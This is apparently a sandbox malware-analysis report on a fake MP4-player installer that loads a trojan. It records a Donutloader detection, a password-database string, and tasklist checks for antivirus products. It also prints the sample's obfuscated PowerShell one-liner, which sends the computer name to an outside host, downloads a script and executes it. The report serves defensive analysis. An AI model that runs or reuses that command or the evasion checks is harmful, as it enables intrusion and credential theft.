              Source: Set-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGo
              Source: Set-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.tomabo.com/mp4-playerA
              Source: Set-up.exe, 00000000.00000003.1828016050.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016787168.000000000050E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.tomabo.com/videos/dog-and-balls.mp4
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Sample or dropped binary is a compiled AutoHotkey binary
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_009708100_3_00970810
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp 8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
              Source: Set-up.exeStatic PE information: invalid certificate
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.6.drStatic PE information: Number of sections : 11 > 10
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.8.drStatic PE information: Number of sections : 11 > 10
              Source: Set-up.exe, 00000000.00000003.1964281016.0000000003A3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1972396342.0000000003961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1828016050.0000000002D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMP4Player.EXE vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1964433037.0000000003B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1967958737.0000000003B53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1971712976.0000000003A6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1972090092.0000000003A59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1968160850.000000000395B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1972620622.0000000003A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1972252215.0000000003B6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1969329161.000000000395E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1967180043.0000000003A4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1963999320.0000000003A39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1963854953.0000000003957000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1968460359.0000000003A57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1964125420.0000000003955000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1963555559.000000000395F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1966578379.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1965168005.0000000003961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1971336232.0000000003961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1963708736.0000000003A43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000002.2016787168.000000000050E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMP4Player.EXE vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1965643088.0000000003962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1964905610.0000000003B28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1971905807.0000000003954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1967585828.0000000003957000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1966984227.000000000395A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1969645771.0000000003A60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1967389831.0000000003B50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1969148116.0000000003A56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1964586600.0000000003958000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1964745312.0000000003A42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1970512609.0000000003A60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1967792833.0000000003A4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1970895176.0000000003B71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1968800733.000000000395C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1966159141.000000000395E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1965370843.0000000003A47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6372:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:340:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_03
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeJump to behavior
              Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: Set-up.exe, 00000000.00000003.1851575771.00000000035E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863521460.00000000035B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Set-up.exeVirustotal: Detection: 12%
              Source: Set-up.exeReversingLabs: Detection: 15%
              Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe "C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe"
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp "C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$F029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe "C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp "C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$10029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; YJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe "C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp "C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$F029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe "C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp "C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$10029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
